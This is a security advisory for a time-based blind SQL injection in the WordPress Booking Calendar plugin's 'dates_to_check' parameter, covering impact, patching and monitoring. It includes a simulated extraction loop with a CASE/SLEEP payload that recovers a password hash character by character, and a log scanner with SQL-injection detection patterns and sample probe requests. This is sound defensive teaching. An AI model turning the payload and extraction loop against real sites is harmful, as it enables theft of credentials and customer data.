CVE-2025-14383

Booking · Booking Calendar plugin for WordPress

A high-severity vulnerability has been identified in the Booking Calendar plugin for WordPress.

Executive summary

The flaw is a time-based blind SQL injection reachable without authentication: by sending specially crafted requests, an attacker can infer the contents of the site's database, including WordPress user credential hashes and customer booking data, even though the plugin never returns query results to the caller. Organizations running this plugin are exposed to a data breach and should apply the vendor's fixed release immediately.

Vulnerability

The vulnerability is a time-based blind SQL injection. The 'dates_to_check' parameter is embedded in a database query without being escaped or bound as a parameter, so attacker-supplied text is parsed as part of the SQL statement. Because the plugin does not return the query's output, the attacker instead appends a conditional delay (for example a CASE expression that calls the database's sleep function only when an attacker-chosen condition is true) and reads the answer from the server's response time. Repeating this with conditions such as "is the n-th character of this value greater than X" recovers arbitrary data one character at a time, including data the plugin itself never displays, such as password hashes in the users table.
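The mechanism described above, as an added simulation that is not code from the plugin or from this advisory: an in-memory SQLite database stands in for the site's MySQL database, a registered SLEEP() function records the requested delay on a virtual clock instead of actually sleeping (so the demo is deterministic), the parameter name dates_to_check is the one named in the advisory, and the bookings and demo_users tables, their contents, and the two request handlers are invented for the demonstration. The vulnerable handler interpolates the parameter into the query text; the hardened handler binds it as a parameter (in WordPress the equivalent is $wpdb->prepare() with a %s placeholder). The extraction loop shows how a conditional delay leaks a value one character at a time by binary search over the printable ASCII range.

```python
"""Time-based blind SQL injection: a vulnerable query, its fix, and the
character-by-character inference an attacker runs against the vulnerable one.

Constructed example for illustration. Schema, data and handler names are
invented; only the parameter name dates_to_check comes from the advisory.
"""
import sqlite3


class VirtualClock:
    """Stands in for wall-clock time: SLEEP(n) adds n to elapsed instead of blocking."""

    def __init__(self):
        self.elapsed = 0.0

    def sleep(self, seconds):
        self.elapsed += float(seconds)
        return 0  # mimic MySQL's SLEEP(), which returns 0 when it completes


def build_db():
    conn = sqlite3.connect(":memory:")
    clock = VirtualClock()
    # Register SLEEP(n) so the SQLite demo behaves like MySQL for this purpose.
    conn.create_function("SLEEP", 1, clock.sleep)
    conn.executescript(
        """
        CREATE TABLE bookings(booking_date TEXT);
        INSERT INTO bookings VALUES ('2025-06-01'), ('2025-06-02');
        CREATE TABLE demo_users(user_login TEXT, user_pass TEXT);
        INSERT INTO demo_users VALUES ('admin', 'h4sh');  -- fake hash, constructed
        """
    )
    return conn, clock


def vulnerable_lookup(conn, dates_to_check):
    # Vulnerable pattern: user input is spliced straight into the SQL text.
    sql = f"SELECT COUNT(*) FROM bookings WHERE booking_date = '{dates_to_check}'"
    return conn.execute(sql).fetchone()[0]


def hardened_lookup(conn, dates_to_check):
    # Hardened pattern: the value is bound as a parameter and is only ever data.
    sql = "SELECT COUNT(*) FROM bookings WHERE booking_date = ?"
    return conn.execute(sql, (dates_to_check,)).fetchone()[0]


def timed_request(conn, clock, handler, value):
    """Issue one request and return how long it took on the virtual clock."""
    before = clock.elapsed
    handler(conn, value)
    return clock.elapsed - before


def extract_secret(conn, clock, handler, length=4, delay=5, threshold=2.5):
    """Recover demo_users.user_pass one character at a time from response timing."""
    secret = ""
    for pos in range(1, length + 1):
        lo, hi = 32, 126  # printable ASCII
        while lo < hi:
            mid = (lo + hi) // 2
            # Delay only if the character at this position is greater than mid.
            payload = (
                "2025-06-01' AND (CASE WHEN unicode(substr("
                f"(SELECT user_pass FROM demo_users LIMIT 1),{pos},1)) > {mid} "
                f"THEN SLEEP({delay}) ELSE 0 END) AND '1'='1"
            )
            if timed_request(conn, clock, handler, payload) > threshold:
                lo = mid + 1
            else:
                hi = mid
        secret += chr(lo)
    return secret


if __name__ == "__main__":
    conn, clock = build_db()
    print("vulnerable handler leaks:", repr(extract_secret(conn, clock, vulnerable_lookup)))
    print("hardened handler leaks:  ", repr(extract_secret(conn, clock, hardened_lookup)))
```

Against the hardened handler the same loop recovers only spaces: the CASE/SLEEP text is compared with booking_date as a literal string and is never evaluated, so no request is ever delayed and every comparison reads as "not greater".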

Business impact

This vulnerability is rated High with a CVSS score of 7.5; the rating reflects a full loss of confidentiality for any data reachable by the database account WordPress uses, and the advisory describes no integrity or availability impact. Potential consequences include theft of customer booking details, user login credential hashes, and other proprietary business data. Such a breach can bring reputational damage, regulatory fines (e.g., under GDPR or CCPA), and the cost of incident response and customer notification.

Remediation

Immediate Action: Identify all WordPress instances using the Booking Calendar plugin and update it to a fixed release (the advisory indicates versions greater than 10; confirm the exact fixed version against the vendor's changelog before relying on it). If the plugin is no longer required, deactivate and fully remove it rather than leaving it installed but inactive, so the vulnerable code is no longer present on the server.

Proactive Monitoring: Make sure the web server logs request duration (for example Apache's %D or nginx's $request_time) and review requests that carry the 'dates_to_check' parameter for SQL fragments (SLEEP, BENCHMARK, quotes, comment sequences such as -- or /*), for values that are not well-formed dates, and for bursts of requests from one source that each take a suspiciously uniform number of seconds, which is the signature of a time-based extraction loop. Database administrators should watch the slow query log and the process list for queries containing SLEEP() or BENCHMARK(). A Web Application Firewall (WAF) should be configured to log and block SQL injection patterns. Note that access logs do not record POST bodies, so parameters sent that way are only visible at the WAF or application layer.
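The log review described above, as an added example that is not code from the page or the plugin: it parses Apache combined-format lines with the request duration appended in microseconds (%D), decodes the query string, and flags requests whose dates_to_check value contains SQL tokens or is not a list of ISO dates, as well as requests carrying that parameter that took longer than a threshold. The parameter name comes from the advisory; the admin-ajax.php path, the action name and the sample log lines are constructed for the demonstration and are not the plugin's real endpoint.

```python
"""Flag suspected time-based SQL injection probing in web server access logs.

Constructed example. Assumes Apache combined log format with %D appended:
  LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %D"
The request path and action name below are placeholders, not the plugin's.
"""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "[^"]*" "[^"]*" (?P<usec>\d+)$'
)

# Tokens that have no business in a date parameter.
SQLI_RE = re.compile(
    r"(sleep\s*\(|benchmark\s*\(|waitfor\s+delay|pg_sleep|union\s+select|"
    r"\b(?:or|and)\b\s+\d+\s*=\s*\d+|--|/\*|#|'|\")",
    re.IGNORECASE,
)
# What a well-formed value looks like: one or more ISO dates joined by commas.
DATE_LIST_RE = re.compile(r"^\d{4}-\d{2}-\d{2}(,\d{4}-\d{2}-\d{2})*$")

SLOW_THRESHOLD_USEC = 3_000_000  # 3 s; tune to the site's normal latency


def parse_line(line):
    """Return a dict for one log line, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["usec"] = int(rec["usec"])
    rec["params"] = parse_qs(urlsplit(rec["target"]).query)
    return rec


def classify(rec):
    """Return the reasons a request looks like SQLi probing, or [] if it does not."""
    values = rec["params"].get("dates_to_check")
    if not values:
        return []  # the vulnerable parameter is not present
    reasons = []
    for raw in values:
        value = unquote_plus(raw)  # second decode catches double-encoded payloads
        if SQLI_RE.search(value):
            reasons.append("sql tokens in dates_to_check")
        elif not DATE_LIST_RE.match(value):
            reasons.append("malformed dates_to_check")
    if rec["usec"] >= SLOW_THRESHOLD_USEC:
        reasons.append(f"slow response {rec['usec'] / 1e6:.1f}s")
    return reasons


def scan(lines):
    """Return (ip, target, reasons) for every flagged request."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            hits.append((rec["ip"], rec["target"], reasons))
    return hits


# Constructed sample log lines (RFC 5737 documentation addresses).
SAMPLE_LOG = [
    # normal request, fast
    '203.0.113.10 - - [10/Jan/2025:10:00:01 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=demo_check&dates_to_check=2025-06-01,2025-06-02 HTTP/1.1" 200 512 '
    '"-" "Mozilla/5.0" 120000',
    # time-based probe; the response took 5.2 s
    '198.51.100.7 - - [10/Jan/2025:10:00:05 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=demo_check&dates_to_check=2025-06-01%27%20AND%20SLEEP(5)--%20 HTTP/1.1" '
    '200 512 "-" "curl/8.0" 5200000',
    # boolean probe whose condition was false, so it returned quickly
    '198.51.100.7 - - [10/Jan/2025:10:00:06 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=demo_check&dates_to_check=2025-06-01%27)%20AND%20(1=2 HTTP/1.1" '
    '200 512 "-" "curl/8.0" 140000',
    # slow but unrelated request: parameter absent, so not flagged
    '203.0.113.11 - - [10/Jan/2025:10:00:09 +0000] "POST /wp-admin/admin-ajax.php'
    '?action=heartbeat HTTP/1.1" 200 64 "-" "Mozilla/5.0" 4100000',
]

if __name__ == "__main__":
    for ip, target, reasons in scan(SAMPLE_LOG):
        print(ip, target, ", ".join(reasons))
```

The slowness check deliberately fires on any request carrying the parameter, not only on ones with obvious SQL tokens, because an attacker who pads or encodes the payload past the token list still cannot hide the delay that makes the technique work; expect to tune the threshold to the site's real latency to keep the false positive rate manageable.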

Compensating Controls: If immediate patching is not feasible, deploy a Web Application Firewall (WAF) with a maintained SQL injection ruleset in blocking mode, understanding that a WAF reduces exposure but does not remove the flaw. Apply least privilege to the database account: WordPress and all of its plugins share the single account configured in wp-config.php, so the practical control is to confine that account to the site's own schema with only the statement privileges the site needs and none of the server-level privileges (such as FILE or access to other databases) that would widen the impact of a successful injection. Where the booking functionality is used only by a known population, additionally restrict access to the pages and endpoints that expose it to trusted IP ranges.

Exploitation status

Public Exploit Available: false

Analyst recommendation

Given the High severity rating (CVSS 7.5), the fact that exploitation requires no authentication or user interaction, and the direct risk of data exfiltration, it is strongly recommended that organizations treat this vulnerability as a critical priority. All instances of the affected Booking Calendar plugin must be patched or removed without delay. Although this CVE is not currently on the CISA KEV list and no public exploit is reported, time-based blind SQL injection is well understood and straightforward to automate once a vulnerable parameter is known, so its potential impact on data confidentiality warrants immediate attention.